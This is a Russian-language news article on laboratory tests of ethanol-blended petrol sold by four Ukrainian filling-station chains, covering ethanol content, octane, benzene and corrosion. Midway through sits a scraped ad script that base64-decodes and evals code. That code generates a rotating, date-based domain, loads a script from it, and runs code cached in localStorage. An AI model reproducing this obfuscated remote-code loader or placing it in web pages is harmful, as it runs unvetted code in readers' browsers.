Разница между обычным и спиртовым топливом на украинских АЗС достигает 8 грн/л.
Эксперты проверили, насколько качественное ныне биотопливо в Украине и безопасно ли им заправять автомобили. О результатах исследований пишет Автоцентр.
На альтернативные виды топлива или, как называют их в народе “спиртовые” бензины, еще несколько лет назад возлагались большие перспективы. Даже премиальные сети вводили у себя эти позиции, в частности, WOG. А “первопроходцами” в этом сегменте стала сеть автозаправочных комплексов БРСМ-Нафта. Причина проста — автовладельцы всегда хотят экономить. Разница достигала четырех и более гривен на литре — серьезный аргумент!
Но спустя какое-то время этот вид альтернативного топлива “не взлетел” — в основном из-за дефицита сырья и небольшого спроса многие сети отказались от продвижения данного продукта. Тем не менее, в текущий момент интерес к данному виду бензина снова возрос — всему виной стремительный рост цен на “традиционный” бензин и общее обеднение населения. Сейчас разница в цене между “спиртовым” и обычным бензином может достигать и 8 гривен на литре. Поэтому снова возник вопрос, а как обстоит дело с качеством подобного топлива? Трейдеры производят его самостоятельно, поэтому определенные опасения есть. Это и стало поводом “взяться за пробоотборники” в столичном Институте потребительских экспертиз.
На данный момент подобное топливо экспертам удалось обнаружить только в четырех сетях – БРСМ-Нафта, Авиас, Моttо и региональной сети BVS. Результаты оказались не радужными – половина образцов оказались не “спиртовым” топливом, а какой-то смесью.
насколько спиртовой бензин в Укарине соответствует требованиям к качеству топлива, проверили эксперты Сколько спирта?
Многие автомобилисты с недоверием относятся к биотопливу, мол, спирт – “это же вода”. Этот расхожий стереотип не совсем соответствует действительности. В бензин добавляют не пищевой спирт, который с удовольствием “потребляют” люди, а неочищенный, с большим количеством сивушных масел, обезвоженный и денатурированный бензином. “Это специальный технический спирт. Если топливо сделано по всем нормам и отвечает нормативам ДСТУ, этим топливом можно заправлять любой автомобиль и не беспокоиться, что он может сломаться”, — говорит директор Института потребительских экспертиз Юрий Чорнобривец.
Смотрите видеообзор проверки спиртового топлива:
Лабораторные испытания начались с главного — с определения объемной доли спиртов, величина которой и обуславливает основные свойства спиртового топлива. Надо отметить, что спиртовое топливо делится на две категории. Автобензин с содержанием биоэтанола не менее 30% относится к альтернативным топливам. Если же биоэтанола менее 30%, то это не альтернативное, а спиртовое марок Е5, Е7, Е10 (согласно Техническому регламенту). Эти типы топлива выпускаются по разным нормативным документам и их не стоит путать.
По итогам лабораторных испытаний только образец, приобретённый на АЗК БРСМ-Нафта оказался альтернативными, с содержанием этанола 30,7%. Менее 30% выявлено в образце Моttо, а в образцах с заправок Авиас и BVS этанола и вовсе почти не оказалось! Из чего же сделаны эти смеси, показали дальнейшее изучение состава.
Результаты исследований ИСЭ спиртового топлива в Украине в марте 2021:
Исследования проводились в соответствии с требованиями ДСТУ 8696: 2016 к топливу моторного альтернативного.
Проверка октана и спиртового бензина
Обычно у альтернативных топлив присутствует изрядный запас по этому параметру. В этот раз этот показатель оказался высоким не у всех, хотя и нарушений не было обнаружено.
Этот показатель характеризует стойкость топлива к детонации — преждевременному сгоранию бензина в камере сгорания. Детонация вредна для мотора не только повышенным расходом топлива и снижением мощности, но и преждевременным износом двигателя из-за лишних нагрузок. Октановое число измеряли по исследовательскому методу. Самый высокий запас прочности оказался у топлива А-95Е Premium+ от сети БРСМ-Нафта — 98 единиц! А вот Авиас и BVS ограничились попаданием в норматив — 95,7 и 95 единиц соответственно.
“При сгорании топлива выделяется избыточная энергия, когда сжигается бензин энергия переходит в тепловую энергию. КПД двигателя падает. Когда сжигается этанол, температура ниже и КПД двигателя увеличивается. Даже сокращается расход топлива. Так работают современные двигатели. Если мы поездим на европейских и американских двигателях увидим, что сама технология уже обязывает нас использовать такое топливо”, — прокомментировал Евгений Лукашевич, основатель ЧОА “Украинская технологическая компания”. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Бензол и ароматика
Как известно, бензол и ароматические углеводороды – это вещества, которые могут нанести вред топливной системе и привести к ее преждевременному износу. Кроме того, не испаряясь целиком, бензол смывает масляную пленку в моторе, что приводит к повышенному износу цилиндров двигателя. Ну и конечно, они наносят вред окружающей среде.
Однако без ароматических углеводородов невозможно производить качественный бензин, поскольку ароматика — это процессы вторичной переработки нефти, которые дают высокооктановый компонент. Отрицательные стороны – это негативное влияние на окружающую среду, поэтому содержание этих компонентов ограничивают в нормативных документах. В альтернативных бензинах за счет 30-процентного содержания биоэтанола, содержание ароматических углеводородов можно сократить, так как спирт имеет большое октановое число. “Первое преимущество альтернативного топлива — энергетическая безопасность. Второе — здоровье людей. Добавление этанола в бензин повышает качество топлива с точки зрения выхлопа продуктов, сокращается выброс диоксинов и канцерогенов. Третье — при производстве биоэтанола производятся корма, это продовольственная безопасность. Четвертая — перспективы наращивания производства сырья: кукурузы, пшеницы, свеклы”, — говорит Евгений Лукашевич, эксперт топливного рынка.
Спиртовые бензины производятся по ТУ, поэтому производитель сам определяет граничные количества этих веществ, например, того же бензола. Поэтому оценивали по фактическому содержанию, с оглядкой на ДСТУ для улучшенного “девяносто пятого”, который не допускает содержание бензола больше 1%. Практически отсутствие этого вредного вещества (0,23%) оказалось в образце БРСМ-Нафта. Отличный результат! А вот у коллег не все так радужно. У Авиас содержание бензола 1,2%, что превышает требования ДСТУ для “улучшенного” бензина, а у BVS и вовсе – 2,6%. Такое количество уже может нанести серьезный вред двигателю.
Коррозия не пройдет
Одним из самых важных эксплуатационных показателей спиртового топлива – коррозионная активность. Дело в том, что спирт является сильным растворителем и разъедает резиновые и пластиковые детали топливной системы. Чтобы этого избежать, в состав биотоплива нужно вводить специальную присадку, повышающую значение кислотного параметра pH. В целом, этот показатель должен быть от 6 до 9 единиц.
Все участники справились с этим тестом, а самое высокое значение (7,4 единицы) было обнаружено в пробе топлива А-95Е Premium+ от сети БРСМ-Нафта. Такие показатели говорят о том, что по своим антикоррозионным свойствам спиртовой бензин практически не отличается от обычного бензина и является безвредным для резинотехнических деталей двигателя.
Объемная часть эфиров
После того, как в лаборатории определили, что два образца (Авиас и BVS), не являются “спиртовыми”, был проверен уровень содержания эфиров, кислородсодержащих присадок.
Анализ показал, что топливо из этих двух сетей состоит из соответственно 15 и 20,6% этого компонента. Добавление такого количества кислородсодержащих компонентов приводит к ухудшению теплотворной способности топлива, что приведет в конечном итоге к замедленной динамике авто и большему расходу топлива.
Итоги и мировой опыт
Результаты показали, что заправляться “спиртовым” или “альтернативным” бензином без риска для собственного автомобиля можно и нужно. Важно внимательно подходить к выбору продавцов такого топлива. Ведь сети АЗС производят его самостоятельно, и понять, из чего оно состоит, можно только лабораторным путем. Если же надежный продавец найден, за качество бензина, расход топлива и состояние автомобиля можно не беспокоиться.
“Спиртовой бензин, как известно, имеет определенные моющие свойства. С первыми заморозками у меня этой проблемы словно не бывало: никаких “дабл стартов”, все в порядке. Легкий, всегда надежный пуск даже в морозную погоду, уверенная работа двигателя. На сервисе смотрели свечи, состояние фильтров — все гораздо лучше, чем при использовании обычного бензина”, — рассказывает автоэксперт, замредактора журнала “За рулем” Ярослав Московка, который уже 3 года заправляется “спиртовым бензином”.
Если у альтернативного топлива столько преимуществ, почему оно до сих пор не стало лидером продаж в Украине? Эксперты называют несколько причин: не все водители о нем знают, не во всех розничных сетях его можно купить. Кроме того, биоэтанол в нашей стране стал страшилкой и окутан мифами. А пока на украинском рынке продолжают дебаты о том, вреден ли он или полезен, мир давно ушел вперед. В Бразилии 50% авто ездят на чистом биоэтаноле, остальные — на смеси с 27% спирта. Вся Европа добавляет добавляет в бензин 10% спирта и намерена увеличить содержание до 14% в 2030 году. Китай остановил дотации в производство электрокаров и закупил у Украины 6 млн тонн кукурузы для собственного производства биоэтанола. Для этих целей в КНР построили самый большой в мире биоэтанольный завод в мире. Это третья после США и Бразилии страна по объемам производства и потребления биоэтанола.
“Только в Украине эта история интенсивно блокируется фейками и разными глупостями о том, что биоэтанол это плохо. 85% европейского бензина — бензин с добавлением биоэтанола. Бразильцы ещё в 1976 году, когда все двигатели были на карбюраторах, ввели обязательное добавление 11%. Как результат с 1976 по 2000 годы только на импорте нефти они сэкономили больше 90 млрд долларов. Для Украины это золотое дно», — говорит Тарас Николаенко, исполнительный директор Украинской ассоциации производителей биоэтанола. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-ukraine-proveli-ekspertizu-spirtovogo-benzina-bezopasno-li-zapravlyat-avto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook